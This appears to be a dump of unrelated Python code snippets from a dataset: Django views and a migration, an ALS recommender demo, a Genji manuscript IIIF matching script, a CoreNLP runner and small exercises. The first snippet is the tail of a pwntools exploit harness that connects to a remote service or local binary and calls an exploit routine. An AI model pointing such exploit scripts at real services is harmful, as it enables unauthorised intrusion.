if len(sys.argv) > 1:
proc = remote(connect[1], int(connect[2]))
else:
proc = process(['./tt_re'], env={'LD_LIBRARY_PATH': './'})
exploit()
proc.interactive()
|
from django.shortcuts import render
from django.http import HttpResponse
from .models import Meetups
def home(request):
return render(request,'meetm/home.html')
def user_home(request):
context = {
'meetup': Meetups.objects.all()
}
return render(request,'meetm/user_home.html', context)
def moderator_home(request):
return render(request,'meetm/moderator_home.html')
def user_signup(request):
return render(request,'meetm/user_signup.html')
def plan_meeting(request):
return render(request,'meetm/plan_meeting.html')
|
from .. import Interpreter, adapter
from ..interface import Block
from typing import Optional
import random
class FiftyFiftyBlock(Block):
def will_accept(self, ctx : Interpreter.Context) -> bool:
dec = ctx.verb.declaration.lower()
return any([dec=="5050",dec=="50",dec=="?"])
def process(self, ctx : Interpreter.Context) -> Optional[str]:
if ctx.verb.payload == None:
return None
result = random.choice(["", ctx.verb.payload])
return result
|
import sys
import os
import numpy as np
import math
class ALS:
def __init__(self):
print("init als")
#原始评分表,m * n的评分表
def simple_train_set(self):
train = np.array(
[[3, 4, 5,2],
[0, 1, 1,3],
[0, 0, 1,2]]
)
return train
#计算差错
def evel_error(self,q,x,y,w):
return np.sum((w * (q - np.dot(x,y))) ** 2)
def eval(self, train, max_iteration):
w = train.copy()
for i in range(train.shape[0]):
for j in range(train.shape[1]):
if(train[i][j] > 0.5):
w[i][j] = 1
else:
w[i][j] = 0
m,n = train.shape
lambda_ = 0.1
n_factors = 2
error = 0
x = 3 * np.random.rand(m,n_factors)
y = 3 * np.random.rand(n_factors,n)
for i in range(max_iteration):
x = np.linalg.solve(np.dot(y,y.T) + lambda_ * np.eye(n_factors),np.dot(y,train.T)).T
y = np.linalg.solve(np.dot(x.T,x) + lambda_ * np.eye(n_factors),np.dot(x.T,train))
error = self.evel_error(train,x,y,w)
return x,y,error
if __name__ == '__main__':
als = ALS()
train = als.simple_train_set()
print(train)
x,y,error = als.eval(train,20)
print("X矩阵:")
print(x)
print("Y矩阵:")
print(y)
print("差错值:")
print(error)
|
import sys
n = int(sys.stdin.readline())
time = list(map(int, sys.stdin.readline().split(' ')))
time = sorted(time)
incul = 0
deagi = 0
for v in time:
incul += deagi + v
deagi += v
print (incul)
|
# Generated by Django 3.1.4 on 2020-12-18 22:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('recorder', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Manufacturer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('kk', models.IntegerField(default=12)),
],
),
migrations.AlterField(
model_name='instantcontent',
name='contentType',
field=models.IntegerField(choices=[(1, 'Text & Image'), (2, 'Location'), (3, 'Voice')], null=True),
),
migrations.AddField(
model_name='instantcontent',
name='manufacturer',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='recorder.manufacturer'),
),
]
|
import urllib.request
from bs4 import BeautifulSoup
import csv
from time import sleep
import pandas as pd
import json
import urllib.request
import os
from PIL import Image
import yaml
import requests
import sys
import argparse
import Levenshtein
df = pd.read_excel('/Users/nakamurasatoru/git/d_genji/kouigenjimonogatari.github.io/src/data/metadata.xlsx', header=None, index_col=None)
configs = {}
for i in range(len(df.index)):
uri = df.iloc[i, 0]
if not pd.isnull(uri):
row_num = df.iloc[i, 2]
if int(row_num) == 1:
title = df.iloc[i, 3]
vol = df.iloc[i, 6]
page = df.iloc[i, 1]
if vol not in configs:
configs[vol] = {
"data" : {}
}
configs[vol]["data"][title] = page
for vol in configs:
config = configs[vol]
koui = config["data"]
VOL = str(vol).zfill(2)
'''
if VOL != "51" and False:
continue
'''
print(VOL)
path = '../../docs/iiif/nijl_kuronet/'+VOL+'.json'
if not os.path.exists(path):
continue
with open(path) as f:
df = json.load(f)
members = df["selections"][0]["members"]
################## マッチング
map = {}
indexedObj = {}
for line in koui:
map[line] = []
for i in range(len(members)):
label = ""
# -1行
if i - 1 >= 0:
label += members[i-1]["label"] + "/"
# 該当行
member = members[i]
label += member["label"]
# +1行
'''
if i + 1 <= len(members) - 1:
label += "/" + members[i+1]["label"]
'''
score = Levenshtein.distance(line, label.replace("/", ""))
score = score / max(len(line), len(label.replace("/", ""))) # 正規化
obj = {
"label" : label,
"main" : member["label"],
"score" : score,
"member_id" : member["@id"],
"index" : i
}
map[line].append (obj)
indexedObj[i] = obj
################## 集計
prev_index = 0
# 校異のライン毎に
for line in map:
print(str(koui[line])+"\t"+line)
obj = map[line]
# 部分取得
# obj = obj[prev_index:]
# スコアが小さい順に並び替え
score_sorted = sorted(obj, key=lambda x:x["score"])
flg = True
for i in range(len(score_sorted)):
data = score_sorted[i]
index = data["index"]
'''
if i < 10:
print(i, data["index"], data["score"], data["member_id"].split("/canvas/")[1], data["label"])
'''
# if index - prev_index < 50:
if flg:
# print("******:")
prev_index = index + 1
# if prev_index - 1 < len(obj):
# data = obj[prev_index - 1]
index = data["index"]
if index > 0:
data = indexedObj[index - 1]
table = '''
<table class="table">
<tr>
<th>項目</th>
<th>値</th>
</tr>
<tr>
<td>大成番号</td>
<td>'''+str(koui[line])+'''</td>
</tr>
<tr>
<td>校異源氏テキスト</td>
<td>'''+line+'''</td>
</tr>
<tr>
<td>KuroNet翻刻</td>
<td>'''+data["main"]+'''</td>
</tr>
<tr>
<td>KuroNet翻刻(前後を含む3行)</td>
<td>'''+data["label"]+'''</td>
</tr>
</table>
'''
########### マーカーのためのID作成
member_id = data["member_id"]
# member_id = member["@id"]
sss = member_id.split("#xywh=")
canvas_id = sss[0]
xywh = sss[1].split(",")
d = 5
y = int(int(xywh[1]) * d / (d+1))
if y == 0:
y = 800
w = 1
x = int(xywh[0]) + int(int(xywh[2]) / 2)
member_id = canvas_id+"#xywh="+str(x)+","+str(y)+","+str(w)+",1"
###########
members.append({
"@id" : member_id,
"@type": "sc:Canvas",
"description": "",
"label": "["+str(len(members) + 1)+"]",
"metadata": [
{
"label": "p",
"value": koui[line]
},
{
"label": "校異源氏テキスト",
"value": line
},
{
"label": "KuroNet翻刻",
"value": data["main"]
},
{
"label": "KuroNet翻刻(前行を含む)",
"value": data["label"]
},
{
"label": "Annotation",
"value": [
{
"@id": member_id,
"@type": "oa:Annotation",
"motivation": "sc:painting",
"resource": {
"@type": "cnt:ContentAsText",
"chars": table,
"format": "text/html",
"marker": {
"border-color": "red",
"@type": "dctypes:Image",
"@id": "https://nakamura196.github.io/genji_curation/icon/red.png#xy=16,16"
}
},
"on": member_id
}
]
}
]
})
flg = False
print("----------------")
curation = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@id": df["@id"],
"@type": "cr:Curation",
"label": "Character List",
"selections": [
{
"@id": df["@id"] + "/range1",
"@type": "sc:Range",
"label": "Characters",
"members": members,
"within" : df["selections"][0]["within"]
}
]
}
f2 = open(path.replace("/nijl_kuronet/", "/nijl_kuronet_taisei_all/"), 'w')
json.dump(curation, f2, ensure_ascii=False, indent=4,
sort_keys=True, separators=(',', ': '))
|
#!/usr/bin/env python
import os, sys, tempfile, subprocess
class_path = '"/Users/noji/Dropbox/tmp/stanford-corenlp-full-2015-12-09/*"'
input_dir = '/Users/noji/Dropbox/data/penn3/PARSED/MRG/WSJ/'
output_dir = os.path.dirname(os.path.abspath( __file__ )) + '/../section/'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
def run_corenlp(tree_dir_path, out_path):
tmp = tempfile.NamedTemporaryFile()
subprocess.check_call('cat %s/* > %s' % (tree_dir_path, tmp.name), shell=True)
tmp.seek(0)
subprocess.check_call('java -cp %s edu.stanford.nlp.trees.EnglishGrammaticalStructure \
-treeFile %s -conllx -basic -originalDependencies > %s' % (class_path, tmp.name, out_path), shell=True)
dirs = os.listdir(input_dir)
for dir_num in dirs:
if (len(dir_num) == 2):
print 'processing %s...' % dir_num
run_corenlp(os.path.join(input_dir, dir_num), os.path.join(output_dir, dir_num))
print 'done.'
|
word = str(input("Give me a word to check if it is a Palindrome:"))
rev_word = word[::-1]
if word == rev_word:
print ("The word is a palindrome")
else:
print ("The word is not a palindrome")
|
#https://www.wsy.com/search.php?accurate=&search_type=item&q=%E7%94%B7%E8%A3%85
# 低优先
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.